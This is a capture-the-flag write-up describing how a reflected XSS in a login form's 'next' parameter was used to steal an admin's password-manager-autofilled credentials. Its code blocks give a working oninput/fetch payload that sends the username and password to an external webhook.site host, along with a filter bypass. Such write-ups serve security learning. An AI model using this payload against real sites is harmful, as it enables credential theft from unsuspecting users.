There is a website under `http://34.76.228.102:2003` allowing to login with any login and password excluding `admin`. The `admin` user has it's password required and logging in as admin would give us the flag. The challenge text says that admin is using password manager so I assumed their credentials will be automatically filled when they enter login site.

The website itself allows to send any url and the admin would check it's security. I've created the webhook using [webhook.site](https://webhook.site) and it turns out that if I post this webhook url to the system after few seconds I get the request from that machine.

Examining login page I've found that there is `?next=` added to it's url. Anything we put into this parameter shows inside of `action` attribute of the login form. This is the classic XSS vulnerability that we can exploit. We can add there almost anything, but not `>` as it is changed into `>` on the site, so we can only operate within the `form` element attributes.

The idea for the payload here is to put the webhook url as `action` attribute and add `oninput` event handler that will send the login and password as it will be filled by password manager. Initial idea for the this attribute was:

```
oninput=fetch(this.action + this[0].value + `-` + this[1].value)
```

but it turned out that `+` signs are stripped, so I've tried with an array and join method like this:

```
oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))
```

and it worked fine. The final payload I've sent was:

```
http://34.76.228.102:2003/login?next=https://webhook.site/[my_webhook_guid]?c= oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))
```

And after a couple of seconds I got the series of requests on my webhook with the last one containing full credentials of an admin:

```
admin-WxBkJjpgzAdPsEXr
```

Logging with this credentials it displayed a flag: `hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}`